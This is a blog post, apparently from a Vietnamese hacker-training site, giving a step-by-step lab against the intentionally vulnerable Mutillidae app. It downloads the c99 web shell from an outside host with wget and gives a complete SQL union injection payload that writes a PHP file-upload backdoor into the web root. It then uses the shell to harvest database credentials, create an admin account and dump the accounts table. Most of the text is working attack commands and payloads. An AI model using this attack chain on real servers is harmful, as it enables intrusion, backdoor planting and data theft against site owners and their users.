Powered by Blogger.
Home » » OWASP Top 10 Web Hacking Final Lab 11 - SQL Injection Union Exploit #4 (Create PHP Upload Script)

OWASP Top 10 Web Hacking Final Lab 11 - SQL Injection Union Exploit #4 (Create PHP Upload Script)

Written By Akademy on Thursday, November 21, 2013 | 9:10 PM

{ SQL Injection Union Exploit #4 
(Create PHP Upload Script) }

    OWASP Top 10 Web Hacking Final  Lab 11 
Download c99.php

  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal
    • Note(FYI):
      1. You can re-use your previous console terminal from (Section 6, Step 1).
  2. Download c99.rar
    • Instructions:
      1. mkdir -p /root/backdoor
      2. cd /root/backdoor/
      3. wget http://r57.gen.tr/shell/c99.rar
      4. ls -l c99.rar
  3. Uncompress c99.rar
    • Note(FYI):
      • A rar file is a type of compression format that is seen more in the windows environment than in linux.
      • Also, we will edit the c99.php file with the sed utility.
    • Instructions:
      1. unrar x c99.rar
        • Extract c99.php
      2. cp c99.php c99.php.bkp
      3. head -1 c99.php
        • Notice how the first line does NOT contain "<?php".
      4. sed -i '1 s/^.*$/<?php/g' c99.php
        • This only replaces the first line of file with "<?php".
      5. head -1 c99.php
        • Notice how the first line DOES contain "<?php".
      6. ls -l

Section 8. Database Union Explanation
  1. On Fedora 14 - Mutillidae
    • Notes (FYI):
      • Use your existing Terminal you opened in (Section 3, Step 1).
    • Instructions:
      1. su - root
      2. mysql -uroot -psamurai
      3. show databases;
      4. use nowasp;
  2. Show Tables
    • Instructions:
      1. show tables;
    • Notes (FYI):
      1. show tables, list all the tables in the particular DATABASE.
  3. Show Tables
    • Instructions:
      1. desc accounts;
    • Notes (FYI):
      1. desc accounts, show the accounts TABLE fields.
      2. The Mutillidae User Info Application uses this table.
      3. Notice it has 5 field.
      4. In order to complete a successful SQL union injection, it will need to include 5 fields.
      5. E.g., ' union select null,null,null,null,null' --

Section 9. Navigate to the User Info Page
  1. On BackTrack, Open Firefox
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
  2. Open Mutillidae
    • Notes (FYI):
      • Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. http://192.168.1.111/mutillidae
  3. Go to User Info
    • Instructions:
      1. OWASP Top 10 --> A1 - SQL Injection --> SQLi - Extract Data --> User Info

Section 10. Inject Upload Form into User Info Page
  1. Inspect the View Account Details Button with Firebug
    • Instructions:
      1. Right click on the View Accounts Details Button
      2. Click on Inspect Element
  2. Change Button Placement
    • Instructions:
      1. After the string style="text-align:, Change center to left. (See Picture)
      2. Click on the Close Button
    • Note(FYI):
      1. You are changing the button positioning, so you are still able to see the button, after you change the size of the Name Textbox in the following step.
  3. Inspect the Name Textbox with Firebug
    • Instructions:
      1. Right click on the Name Textbox
      2. Click on Inspect Element
  4. Change Text Box Size
    • Instructions:
      1. After the string "size=", Change 20 to 550. (See Picture)
      2. Click on the Close Button
  5. Backdoor Union SQL Union Injection
    • Instructions:
      1. In the Name Textbox place the following string.  Remember to put a space after the "-- ".
        • ' union select null,null,null,null,'<html><body><div><?php if(isset($_FILES["fupload"])) { $source = $_FILES["fupload"]["tmp_name"]; $target = $_FILES["fupload"]["name"]; move_uploaded_file($source,$target); system("chmod 770 $target"); $size = getImageSize($target); } ?></div><form enctype="multipart/form-data" action="<?php print $_SERVER["PHP_SELF"]?>" method="post"><p><input type="hidden" name="MAX_FILE_SIZE" value="500000"><input type="file" name="fupload"><br><input type="submit" name="upload!"><br></form></body></html>' INTO DUMPFILE '/var/www/html/mutillidae/upload_file.php' --
      2. Click the View Account Details button
    • Note(FYI):
      1. This above SQL union statement writes a small php script into the following location /var/www/mutillidae/execute_command.php.
      2. ' union select null,null,null,null,' - This is the start of SQL union injection statement, that includes the first four fields follow by the start of the fifth field (,').
      3. <html><body><div> - This is standard opening body to a HTML page. 
      4. <?php if(isset($_FILES["fupload"])) { $source = $_FILES["fupload"]["tmp_name"]; $target = $_FILES["fupload"]["name"]; move_uploaded_file($source,$target); system("chmod 770 $target"); $size = getImageSize($target); } ?> - This is the PHP script that allows a person to upload a 500,000 byte file (value="500000"). The browse button is represented as (<input type="file" name="fupload">). The submit button is represented as (<input type="submit" name="upload!">).
      5. ' INTO DUMPFILE ' - This tells MySQL to place the HTML Form / PHP Script into a file.
      6. /var/www/html/mutillidae/upload_file.php - This is the output file.
  6. Viewing the Results
    • Note(FYI):
      1. This is a typical error message saying either a bad user name or password was supplied.
      2. Typically, web designers should not display what caused an error.  Highlighted by the red rectangle, notice that now the upload form is embedded in the query results.

Section 11. Upload c99.php to Mutillidae
  1. Upload c99.php to Mutillidae
    • Notes (FYI):
      • Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. Place the following URL in the Address Bar
        • http://192.168.1.111/mutillidae/upload_file.php
      2. Click the Browse Button
      3. Navigate to /root/backdoor
      4. Click on c99.php
      5. Click the Open Button
      6. Click the Submit Query Button

Section 12. Using c99.php's to grab database password
  1. Server security information
    • Notes (FYI):
      • Replace 192.168.1.111 in the following URL with your Mutillidae's IP Address obtained from (Section 3, Step 3)
        • http://192.168.1.111/mutillidae/c99.php,
    • Instructions:
      1. Place the following URL in the address bar
        • http://192.168.1.111/mutillidae/c99.php
      2. Click on the Sec. link
  2. Discover Mutillidae Application Directory
    • Instructions:
      1. Place "pwd" in the upper-left command execute text box. (See Picture).
      2. Click Execute
    • Note(FYI):
      1. pwd - print name of current/working directory.
  3. Search php scripts for the string password
    • Notes (FYI):
      • Now we will search the 900+ php scripts for the string "password" and "=".
    • Instructions:
      1. Notice that /var/www/html/mutillidae is displayed in the results sections.  This is the Mutillidae Application directory.  In the following step, we will use find to search the /var/www/html/mutillidae directory to search for php scripts that contain a password.
      2. Place the following command in the second pane:
        • find /var/www/html/mutillidae -name "*.php" | xargs grep -i "password" | grep "="
      3. Click Execute button
  4. Viewing Password Results
    • Notes (FYI):
      1. Notice the password is "samurai".
      2. Notice that script that contains the samarai password is located as follows:
        •  /var/www/html/mutillidae/classes/MySQLHandler.php
  5. Viewing the Code
    • Notes (FYI):
      • It is possible to display the contents of the MySQLHandler.php program, by encoding the "<?php" and "?>" tags.  These tags tell apache to execute a php script.  To get around this problem and just display the text of the program, we change "<" to "&#60;" and ">" to "&#62;".
    • Instructions:
      1. Place the following command in the second pane:
        • find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs cat | sed 's/</\&#60;/g' | sed 's/>/\&#62;/g'
      2. Click the Execute Button
      3. Database Username
        • static public $mMySQLDatabaseUsername = "root";
      4. Database Password
        • static public $mMySQLDatabasePassword = "samurai";
      5. Database Name
        • static public $mMySQLDatabaseName = "nowasp";

Section 13. Using c99.php's to examine pillage the database
  1. Connect to SQL
    • Instructions:
      1. Click the SQL navigation link.
      2. Username: root
      3. Password: samurai
      4. Database: nowasp
      5. Click the Connect Button
  2. Select the "accounts" table
    • Instructions:
      1. Click on accounts
  3. Insert Record Link
    • Instructions:
      1. Click the [ Insert ] Link
  4. Supply New User Information
    • Instructions:
      1. cid Value: 20
      2. username Value: hacker
      3. password Value: hacker
      4. mysignature: Your Name
        • Note: Replace the string "Your Name" with your actual name. 
        • E.g., John Gray
      5. is_admin: TRUE
      6. Click the Confirm Button
  5. Insert New User Information
    • Instructions:
      1. Click the Yes Button
    • Note(FYI):
      1. This is the SQL syntax to insert a new user into the "accounts" table.
  6. Verify New User Information
    • Note(FYI):
      1. Scroll Down (See Picture)
      2. Verify that your hacker account was created
  7. Prepare to Dump the Accounts Table
    • Instructions:
      1. Scroll Up (See Picture)
      2. Click the Dump Link
  8. Dump the Accounts Table
    • Instructions:
      1. DB: nowasp
      2. Only tables (explode ";"): accounts
      3. File: ./dump_nowasp_accounts.sql
      4. Download Checkbox: Check it
      5. Save to file Checkbox: Check it
      6. Click the Dump Button
    • Note(FYI):
      1. You will be prompted to save the file, so please continue to next step for further directions.
  9. Save Accounts Dump File (Part 1)
    • Instructions:
      1. Click the Save File Radio Button
      2. Click the OK Button
  10. Save Accounts Dump File (Part 2)
    • Instructions:
      1. Name: dump_nowasp_accounts.sql
      2. Click the [+] in front of Browse for other folders
      3. Click the root folder
      4. Click the Save Button

Section 14. Proof of Lab
  1. Proof of Lab : Các bạn hãy quay lại toàn bộ tiến trình thực hành và text note có tên của mình
Share this article :

0 comments:

 
Trung Tâm Đào Tạo An Toàn Thông Tin Học Hacker Mũ Xám Online | Học An Ninh Mạng Trực Tuyến | CEH VIỆT NAM
Copyright © 2013. HACKER MŨ XÁM - All Rights Reserved
Web Master @ Võ Sĩ Máy Tính
Contact @ Đông Dương ICT